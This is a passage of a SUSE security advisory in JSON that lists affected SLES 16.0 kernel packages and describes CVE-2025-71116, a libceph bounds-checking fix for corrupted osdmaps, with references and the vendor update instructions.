"SUSE Linux Enterprise Server for SAP applications 16.0:gfs2-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:gfs2-kmp-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-64kb-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-64kb-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-64kb-extra-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-azure-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-azure-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-azure-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-azure-devel-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-azure-extra-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-azure-extra-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-azure-vdso-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-devel-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-devel-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-devel-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-extra-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-extra-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-extra-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-extra-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-livepatch-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-livepatch-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-livepatch-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-vdso-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-devel-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-docs-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-docs-html-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-kvmsmall-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-kvmsmall-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-kvmsmall-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-kvmsmall-vdso-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-macros-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-obs-qa-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-obs-qa-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-obs-qa-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-obs-qa-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-source-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-source-vanilla-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-syms-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-syms-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-syms-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-syms-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-zfcpdump-6.12.0-160000.26.1.s390x"
]
}
],
"threats": [
{
"category": "impact",
"date": "2026-02-27T11:51:02Z",
"details": "moderate"
}
],
"title": "CVE-2025-71114"
},
{
"cve": "CVE-2025-71116",
"ids": [
{
"system_name": "SUSE CVE Page",
"text": "https://www.suse.com/security/cve/CVE-2025-71116"
}
],
"notes": [
{
"category": "general",
"text": "In the Linux kernel, the following vulnerability has been resolved:\n\nlibceph: make decode_pool() more resilient against corrupted osdmaps\n\nIf the osdmap is (maliciously) corrupted such that the encoded length\nof ceph_pg_pool envelope is less than what is expected for a particular\nencoding version, out-of-bounds reads may ensue because the only bounds\ncheck that is there is based on that length value.\n\nThis patch adds explicit bounds checks for each field that is decoded\nor skipped.",
"title": "CVE description"
}
],
"product_status": {
"recommended": [
"SUSE Linux Enterprise Server 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:dlm-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:dlm-kmp-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:gfs2-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:gfs2-kmp-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-64kb-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-64kb-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-64kb-extra-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-azure-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-azure-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-azure-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-azure-devel-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-azure-extra-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-azure-extra-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-azure-vdso-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-default-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-default-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server 16.0:kernel-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-default-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-default-devel-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-default-devel-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server 16.0:kernel-default-devel-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-default-extra-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-default-extra-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-default-extra-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server 16.0:kernel-default-extra-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-default-livepatch-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-default-livepatch-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server 16.0:kernel-default-livepatch-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-default-vdso-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-devel-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server 16.0:kernel-docs-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server 16.0:kernel-docs-html-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server 16.0:kernel-kvmsmall-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-kvmsmall-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-kvmsmall-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-kvmsmall-vdso-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-macros-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server 16.0:kernel-obs-qa-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-obs-qa-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-obs-qa-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server 16.0:kernel-obs-qa-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-source-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server 16.0:kernel-source-vanilla-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server 16.0:kernel-syms-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-syms-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-syms-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server 16.0:kernel-syms-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-zfcpdump-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server for SAP applications 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:dlm-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:dlm-kmp-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:gfs2-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:gfs2-kmp-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-64kb-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-64kb-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-64kb-extra-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-azure-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-azure-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-azure-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-azure-devel-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-azure-extra-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-azure-extra-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-azure-vdso-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-devel-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-devel-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-devel-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-extra-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-extra-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-extra-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-extra-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-livepatch-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-livepatch-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-livepatch-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-vdso-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-devel-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-docs-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-docs-html-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-kvmsmall-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-kvmsmall-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-kvmsmall-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-kvmsmall-vdso-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-macros-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-obs-qa-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-obs-qa-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-obs-qa-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-obs-qa-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-source-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-source-vanilla-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-syms-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-syms-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-syms-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-syms-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-zfcpdump-6.12.0-160000.26.1.s390x"
]
},
"references": [
{
"category": "external",
"summary": "CVE-2025-71116",
"url": "https://www.suse.com/security/cve/CVE-2025-71116"
},
{
"category": "external",
"summary": "SUSE Bug 1256744 for CVE-2025-71116",
"url": "https://bugzilla.suse.com/1256744"
}
],
"remediations": [
{
"category": "vendor_fix",
"details": "To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or \"zypper patch\".\n",
"product_ids": [
"SUSE Linux Enterprise Server 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:dlm-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:dlm-kmp-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:gfs2-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:gfs2-kmp-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-64kb-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-64kb-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-64kb-extra-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-azure-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-azure-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-azure-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-azure-devel-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-azure-extra-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-azure-extra-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-azure-vdso-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-default-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-default-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server 16.0:kernel-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-default-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-default-devel-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-default-devel-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server 16.0:kernel-default-devel-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-default-extra-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-default-extra-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-default-extra-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server 16.0:kernel-default-extra-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-default-livepatch-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-default-livepatch-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server 16.0:kernel-default-livepatch-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-default-vdso-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-devel-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server 16.0:kernel-docs-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server 16.0:kernel-docs-html-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server 16.0:kernel-kvmsmall-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-kvmsmall-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-kvmsmall-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-kvmsmall-vdso-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-macros-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server 16.0:kernel-obs-qa-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-obs-qa-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-obs-qa-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server 16.0:kernel-obs-qa-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-source-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server 16.0:kernel-source-vanilla-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server 16.0:kernel-syms-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-syms-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-syms-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server 16.0:kernel-syms-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-zfcpdump-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server for SAP applications 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:dlm-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:dlm-kmp-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:gfs2-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:gfs2-kmp-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-64kb-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-64kb-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-64kb-extra-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-azure-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-azure-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-azure-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-azure-devel-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-azure-extra-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-azure-extra-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-azure-vdso-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-devel-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-devel-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-devel-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-extra-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-extra-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-extra-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-extra-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-livepatch-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-livepatch-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-livepatch-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-vdso-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-devel-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-docs-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-docs-html-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-kvmsmall-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-kvmsmall-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-kvmsmall-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-kvmsmall-vdso-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-macros-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-obs-qa-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-obs-qa-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-obs-qa-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-obs-qa-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-source-6.12.0-160000.26.1.noarch",
